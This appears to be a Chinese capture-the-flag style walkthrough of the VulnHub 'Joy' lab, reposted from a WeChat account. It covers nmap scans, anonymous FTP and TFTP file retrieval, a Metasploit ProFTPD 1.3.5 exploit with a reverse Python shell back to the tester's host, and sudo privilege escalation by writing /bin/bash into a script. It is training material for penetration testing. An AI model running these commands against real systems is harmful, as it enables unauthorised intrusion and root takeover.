joy靶场

OSCP--joy

声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者和此公众号不为此承担任何责任。

一、启动靶场

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

启动完成

二、靶场渗透

首先扫主机与端口

nmap -sn 192.168.126.0/24    

nmap -p- -sV -sC -Pn 192.168.126.137

开始攻击

ftp已经检测出来了可以匿名登录

登录ftp的指令    

ftp 192.168.126.137

anonymous

anonymous

get directory

查看我们下载下来的文件,发现了一个version_control文件,里面可能会有服务的版本号等有用的重要信息

cat directory    

那么我们在看一下udp协议有么有我们用的服务

nmap -sU -sV -A --top-port 20 192.168.126.137

发现一个tftp的服务端口是36969

我们可以使用tftp来下载我们刚刚看到的文件version_control

指令:

tftp 192.168.126.137

get version_control

发现了version_control文件里面有一个pproftpd 1.3.5 这个服务,是由漏洞可以拿到shell的,我们使用msfconsole来进行攻击    

我们首先使用kali打开msfconsole工具,之后在使用search 来搜索proftpd 1.3.5 版本的攻击模块

指令:

msfconsole

search proftpd 1.3.5

use 0

接下来做好设置我们就可以进行攻击了          
指令:

set RHOSTS 192.168.126.137(要攻击的主机ip)

set payload cmd/unix/reverse_python

set LHOSTS 192.168.126.128(自己的ip)

set SITEPATH /var/www/tryingharderisjoy

进行攻击,之后交互shell

指令:

run

shell

之后看一下当下文件,发现了一个oss的文件夹,之后进入,又发现一个patricksecretsofjoy文件,cat一下之后发现了patrick的账号密码root的被加密了    

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?

切换到patrick用户,看看是否有sudo -l的权限,上一个账号是没有的,补充一下

/home/patrick/script/test

有一个文件具备sudo的权限

我这个是之前做过所以直接就能获得root权限,但是正常的靶场是没有权限的,之后我们使用sudo /home/patrick/script/test    

之后会让我们试着增加权限,第一此输入使用个回车,第二次输入777这样这个文件就具备了777的权限,之后在往test文件里面写入/bin/bash(指令:echo “/bin/bash” >/home/patrick/script/test),这样在执行sudo/home/patrick/script/test 就可以成功提权了

原文始发于微信公众号（攻防学堂）：joy靶场